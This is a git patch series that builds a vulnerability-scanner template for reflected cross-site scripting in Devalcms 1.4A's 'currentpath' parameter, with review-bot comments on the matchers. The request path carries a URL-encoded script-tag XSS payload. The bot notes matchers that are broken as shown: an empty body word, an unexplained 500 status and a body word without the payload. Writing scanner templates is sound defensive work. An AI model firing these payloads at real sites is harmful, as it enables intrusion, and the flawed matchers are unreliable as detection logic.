From 9304c58b2c06b9e3e678d9d6fa5527e2ed696929 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:26:54 +0530
Subject: [PATCH 1/5] Create devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 32 +++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 vulnerabilities/other/devalcms-xss.yaml
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
new file mode 100644
index 0000000000..aef0e10860
--- /dev/null
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -0,0 +1,32 @@
+id: devalcms-xss
+
+info:
+ name: Devalcms 1.4A - Reflected Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ reference:
+ - https://www.exploit-db.com/exploits/6369
+ description: |
+ Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
+ tags: xss,unauthenticated,cms,reflected
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
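Review bot: The body matcher under `words:` is the empty string `''` as it appears here, and every response contains the empty string, so with `matchers-condition: and` the template reports any `text/html` page that answers 200 whether or not `currentpath` is reflected. The word should be the decoded payload that the request sends, for example `- '<script>alert(1)</script>'`, so a hit shows the markup came back unencoded. The [PATCH 4/5] hunk later replaces this word with `'sub menu for: '`, which as shown is static page text and still does not contain the payload. If the markup inside the quotes was lost when this page was rendered, the matcher may already be correct in the repository, so confirm against the file itself.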
From 0f209ca08c57fc307ed0e4db71812de0a3bc48ac Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:31:44 +0530
Subject: [PATCH 2/5] Update devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
index aef0e10860..ab6a76239a 100644
--- a/vulnerabilities/other/devalcms-xss.yaml
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -5,7 +5,7 @@ info:
author: arafatansari
severity: medium
reference:
- - https://www.exploit-db.com/exploits/6369
+ - https://www.exploit-db.com/exploits/6369
description: |
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
tags: xss,unauthenticated,cms,reflected
From 289f1731bbf27e662513865784c135ab22713d03 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:37:43 +0530
Subject: [PATCH 3/5] Update devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
index ab6a76239a..146dbbe0cd 100644
--- a/vulnerabilities/other/devalcms-xss.yaml
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -29,4 +29,4 @@ requests:
- type: status
status:
- - 200
+ - 500
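Review bot: The status matcher now requires 500 and nothing in the template says why, so a later maintainer is likely to read it as a typo and change it back to 200. If the affected index.php does answer this request with an error page that reflects the parameter, record that above the matcher, e.g. `# Devalcms 1.4A returns HTTP 500 on the page that reflects currentpath`. The matcher list starts outside this hunk, so the other conditions it is combined with are not visible here.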
From 4b6aa7df8138c80f3f2f225fd20fe92a497149cd Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Jul 2022 14:42:25 +0530
Subject: [PATCH 4/5] Update devalcms-xss.yaml
---
vulnerabilities/other/devalcms-xss.yaml | 15 ++++++++-------
1 file changed, 8 insertions(+), 7 deletions(-)
diff --git a/vulnerabilities/other/devalcms-xss.yaml b/vulnerabilities/other/devalcms-xss.yaml
index 146dbbe0cd..1c0eea4a5a 100644
--- a/vulnerabilities/other/devalcms-xss.yaml
+++ b/vulnerabilities/other/devalcms-xss.yaml
@@ -1,26 +1,27 @@
id: devalcms-xss
-
info:
- name: Devalcms 1.4A - Reflected Cross-Site Scripting
+ name: Devalcms 1.4A - Cross-Site Scripting
author: arafatansari
severity: medium
- reference:
- - https://www.exploit-db.com/exploits/6369
description: |
Devalcms 1.4A is affected by Cross-Site Scripting (rXSS) in the 'currentpath' parameter of the index.php file.
- tags: xss,unauthenticated,cms,reflected
+ reference:
+ - https://www.exploit-db.com/exploits/6369
+ metadata:
+ verified: true
+ tags: devalcms,xss,cms
requests:
- method: GET
path:
- - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- - ''
+ - 'sub menu for: '
- type: word
part: header